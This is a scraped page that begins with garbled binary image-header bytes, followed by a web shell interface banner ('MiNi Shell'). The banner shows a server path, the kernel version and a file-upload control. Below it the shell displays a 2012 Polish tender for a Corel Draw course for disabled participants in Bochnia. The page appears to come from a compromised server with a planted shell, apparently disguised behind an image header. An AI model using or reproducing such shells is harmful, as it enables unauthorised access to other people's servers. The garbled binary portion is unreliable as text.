JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120918/352496-N-2012.html

<p class="kh_header"><b>Bochnia: Zorganizowanie i przeprowadzenie kursu Corel Draw dla uczestników projektu pn Wzmacnianie integracji społecznej w Powiecie Bocheńskim</b><br>
<b>Numer ogłoszenia: 352496 - 2012; data zamieszczenia: 18.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. G. Windakiewicza 9/5, 32-700 Bochnia, woj. małopolskie, tel. 14 611 97 40, faks 14 611 97 40.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursu Corel Draw dla uczestników projektu pn Wzmacnianie integracji społecznej w Powiecie Bocheńskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa przeprowadzenia kursu grafiki komputerowej na poziomie podstawowym w zakresie obsługi programu Corel Draw dla nie więcej niż 3 uczestników projektu pn.: Wzmacnianie integracji społecznej w Powiecie Bocheńskim. Uczestnikami kursu będą niepełnosprawni mężczyźni poruszający się na wózkach  inwalidzkich w wieku od 19 do 40 roku życia. Osoby posiadają umiejętność obsługi komputera i 2 osoby mają obniżoną sprawność motoryczną dłoni.
Celem kursu jest podniesienie kwalifikacji zawodowych z dziedziny informatyki. 
Szczególny nacisk należy położyć na wyrobienie u kursantów umiejętności, jakie wymagane są od twórców grafiki oraz animacji z wykorzystaniem technik komputerowych. Kursanci powinni ćwiczyć sprawność i samodzielność w posługiwaniu się programami komputerowymi oraz estetykę i funkcjonalność projektów. Od kandydatów na kurs wymagane będzie posiadanie podstawowej wiedzy informatycznej i biegła znajomość podstawowej obsługi komputera oraz poczucia estetyki na podstawie samooceny kandydata.
Program zajęć teoretycznych i praktycznych powinien obejmować 30 godzin zegarowych w tym: 1. Interfejs programu Corel Draw (grafika rastrowa i wektorowa - specyfika, podobieństwa i różnice, najpopularniejsze formaty graficzne, arkusz roboczy Corela, personalizacja interfejsu, paski, okna, dokery, skróty, otwieranie, zapisywanie i opcje dokumentu CDR, menedżer obiektów i symboli - praca na warstwach, teczki podręczne, rodzaje widoków, dokumenty wielostronicowe, linijki, siatka, prowadnice - ustawienia). 2. Podstawowe narzędzia edycyjne (rysowanie, przenoszenie, usuwanie obiektów, skalowanie, obracanie, pochylanie obiektów przy pomocy myszki, duplikowanie obiektów (wszystkie metody), ustawianie atrybutów konturu, zapoznanie się ze wszystkimi rodzajami wypełnień, tworzenie własnych wypełnień). 3. Precyzyjne transformacje obiektów (rozmiar i położenie, obrót, skala i lustro, pochylanie)  4. Wyrównywanie i rozkład obiektów, modyfikowanie kształtu (grupowanie i łączenie, kształtowanie obiektów: część wspólna, przycinanie, spawanie; edycja krzywej Bezier a i tworzenie złożonych kształtów, narzędziem kształtu, praca na węzłach, rozłączanie i łączenie obiektów, rozłączanie, łączenie i wyrównywanie węzłów).5. Tekst i obróbka tekstu w Corelu (formatowanie i edycja tekstu, rodzaje i atrybuty tekstu, dopasowywanie tekstu do ścieżki). 6. Narzędzia wspomagające pracę w Corel Draw (wektoryzacja grafik rastrowych, import formatów nie obsługiwanych przez program do grafiki wektorowej, wymiarowanie obiektów - rysunek techniczny, przygotowanie pliku do druku w formacie postscriptowym EPS). 7. Efekty w formacie wektorowym (perspektywa, obwiednia, metamorfoza, wytłoczenie, soczewki - warstwy efektowe, kadrowanie, interaktywne efekty, m.in. przezroczystość). 8. Efekty w formacie rastrowym (trójwymiarowe, rozmywanie, wyostrzanie, twórcze, zniekształcanie, ozdobne). 9. Stworzenie własnego projektu reklamowego w formacie wektorowym. 
Zajęcia powinny odbywać się w soboty w godz. 9:00 - 16:00 
Miejsce realizacji kursu powinno znajdować się na terenie miasta Bochnia ze względu na stopień i rodzaj niepełnosprawności uczestników kursu. 
Wykonawca kursu powinien zapewnić uczestnikom:1. materiały szkoleniowe - po otrzymaniu wszystkich materiałów uczestnicy będą zobowiązani do potwierdzenia odbioru w formie pisemnej.  Wykonawca zobowiązany jest do przekazania jednego egzemplarza materiałów szkoleniowych Zamawiającemu najpóźniej w dniu rozpoczęcia szkolenia, 2. nowoczesne metody szkolenia: warsztaty, prezentacje multimedialne, ćwiczenia praktyczne w salach wyposażonych w wysokiej klasy sprzęt komputerowy z zapleczem sanitarnym. Zajęcia powinni prowadzić wykwalifikowani nauczyciele i doświadczeni praktycy, 3. możliwość dostosowania zagadnień poruszanych na kursie do potrzeb i możliwości uczestników, 4. catering podczas zajęć ( ciepły posiłek, napoje zimne i ciepłe, ciastka i paluszki itp) Kurs powinien odbywać się w salach wyposażonych w wysokiej klasy sprzęt komputerowy z myszką i oprogramowaniem umożliwiającym optymalne przeprowadzenie kursu. Pomieszczenia wraz z zapleczem sanitarnym, nie powinny stwarzać barier w zakresie poruszania się dla osób na wózkach inwalidzkich. Sala powinna pomieścić 3 osoby i powinna być wyposażona stosownie do potrzeb 3 osobowej grupy. Przestrzeń robocza niezbędna do uczestniczenia osób niepełnosprawnych w zajęciach powinna spełniać krajowe normy odpowiadające potrzebom osób w zakresie poruszania się na wózkach inwalidzkich, w tym zachowanie odpowiedniej wolnej przestrzeni przy biurku ze względu na konieczność manewrowania wózkiem inwalidzkim, zapewnienie swobodnego poruszania się w przestrzeni, w której nie powinny znajdować się żadne przeszkody. W celu zwiększenia powierzchni biurka/stołu można zastosować system wysuwanych blatów, nadstawek lub mobilnych stolików lub podstawek teleskopowych pod monitor. Szuflady powinny być zabezpieczone przed wypadnięciem.
Wykonawca zobowiązany jest do:1. zapewnienia usług asystenta osoby niepełnosprawnej, którego zadaniem będzie udzielanie indywidualnego wsparcia uczestnikom kursu w miejscu prowadzenia zajęć i obejmować będą czynności, które są trudne do wykonania przez osoby niepełnosprawne a związane są z kwestiami organizacyjnymi kursu. 2. przekazania jednego kompletu materiałów dydaktycznych dla Zamawiającego. Komplet materiałów dydaktycznych Wykonawca dostarczy do Zamawiającego najpóźniej w dniu rozpoczęcia kursu, 3. dodatkowo Wykonawca wyposaży uczestników kursu w niezbędne materiały biurowe i piśmienne. 
Wykonawca zobowiązany będzie do zamieszczenia w dokumentacji kursu informacji o finansowaniu projektu przez Unię Europejską, a także oznakowania miejsca realizacji kursu. Wykonawca winien zapewnić uczestnikom kursu warunki do nauki w oparciu o zasady BHP. Wykonawca kursu zobowiązany będzie do przedstawienia w ofercie kursu harmonogramu realizowanych zajęć zawierającego datę, godzinę i tematy zajęć.
Po ukończeniu kursu Wykonawca zobowiązany będzie do wydania uczestnikom zaświadczeń potwierdzających ukończenie kursu (zgodne z rozporządzeniem MEN dot. kształcenia ustawicznego) lub odpowiedni certyfikat umiejętności komputerowych. Dokument powinien posiadać stosowne oznakowanie POKL i UE. Wykonawca zobowiązany będzie do załączenia do oferty wzoru zaświadczenia, a także do prowadzenia odpowiedniej dokumentacji tj:1. dziennej listy obecności uczestników kursu, 2. dziennika zajęć zawierającego wymiar godzin i tematy zajęć edukacyjnych, 3. listę imienną potwierdzającą odbiór materiałów szkoleniowych, biurowych oraz korzystanie z cateringu. 
Wykonawca pod rygorem utraty prawa do zapłaty za kurs, zobowiązany będzie do niezwłocznego poinformowania Zamawiającego o: 1. nie zgłoszeniu się uczestników na kurs;2. przerwaniu szkolenia lub rezygnacji z uczestnictwa oraz o każdorazowej nieobecności uczestnika kursu na zajęciach; 3. innych sytuacjach, które mają wpływ na realizację programu kursu i umowy.
Wykonawca zobowiązany będzie do przekazania Zamawiającemu w terminie 7 dni od dnia zakończenia kursu, następujących dokumentów: 1. kserokopii dziennika zajęć potwierdzonej za zgodność z oryginałem;2. kserokopii list obecności potwierdzonych za zgodność z oryginałem; 3. kserokopii wszystkich zaświadczeń i/lub certyfikatów potwierdzających ukończenie kursu potwierdzonych za zgodność z oryginałem;
4. imiennej listy uczestników kursu  potwierdzającej odbiór materiałów szkoleniowych, biurowych i korzystanie z cateringu. 
Wymagania wobec osoby prowadzącej zajęcia:
Zajęcia powinni prowadzić wykwalifikowani nauczyciele z zakresu informatyki i doświadczeni praktycy posiadający co najmniej 3 letni staż pracy, w tym udokumentowane doświadczenie w pracy z osobami niepełnosprawnymi ruchowo..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do rejestru ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b/ wpis do rejestru instytucji szkoleniowych

ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób  realizujących zamówienia wraz z opisem  doświadczenia, wykształcenia oraz jaką rolę będą pełnić w realizacji zamówienia

ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły spełnia - nie spełania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
b/ aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzające, że uzyskał przewidziane prawem zwolnienie, odroczenie lub układ ratalny dla zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły spełnia - nie spełania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy (stanowi załącznik nr 1 do SIWZ) 
Oświadczenie Wykonawcy (stanowi załącznik nr 2 do SIWZ), że Wykonawca spełnia wymogi art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Oświadczenie Wykonawcy (załącznik nr 3 do SIWZ), że: cena oferty obejmuje pełny zakres usługi oraz jest zgodna z wytycznymi SIWZ.
Program kursu wraz z harmonogramem zgodny z wymogami określonymi w SIWZ
W celu potwierdzenia braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawca składa Oświadczenie (stanowi załącznik nr 4 do SIWZ) o którym mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych.
Wykaz osób  realizujących zamówienia wraz z opisem  doświadczenia, wykształcenia;
Zaakceptowany wzór umowy (załącznik nr 5 do SIWZ) 
Wzór świadectwa/zaświadczenia jakie otrzymają uczestnicy szkolenia
Oświadczenie, że szkolenie będzie przeprowadzone w Bochni 
Oświadczenie, że szkolenie będzie przeprowadzone w salach wyposażonych w sprzęt komputerowy  i sala  szkoleniowa nie stwarza barier w zakresie poruszania się wózkiem inwalidzkim. 
W celu wykazania spełnienia warunków udziału w postępowaniu Wykonawca wraz z ofertą zobowiązany jest złożyć niżej wymienione oświadczenia i dokumenty wskazane z części V w SIWZ.
Wykonawca upoważnia Powiatowe Centrum Pomocy Rodzinie w Bochni lub jego upoważnionych przedstawicieli do przeprowadzenia wszelkich badań mających na celu sprawdzenie oświadczeń, dokumentów i przedłożonych informacji oraz do wyjaśnienia finansowych i technicznych aspektów tego zgłoszenia. Dla tych celów Wykonawca upoważnia każdą osobę publiczną, bank lub przedsiębiorstwa wymienione w formularzu ofertowym do dostarczenia stosownej informacji uznanej przez Powiatowe Centrum Pomocy Rodzinie, 
za konieczną i wymaganą w celu sprawdzenia oświadczeń i informacji zawartych w ofercie.
Oświadczenie Wykonawcy, że zapoznał się z zakresem zamówienia oraz uzyskał wszelkie niezbędne informacje w celu przygotowania i złożenia oferty z należytą starannością.
ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły spełnia - nie spełania</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/powiaty/root_bochenski/Wprowadzenie/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum pomocy Rodzinie w Bochni 
ul. E. Windakiewicza 9/5
32-700 Bochnia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2012 godzina 11:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Bochnia
ul. E. Windakiewicza 9/5,32-700 Bochnia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. Wzmacnianie integracji społecznej w Powiecie Bocheńskim.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com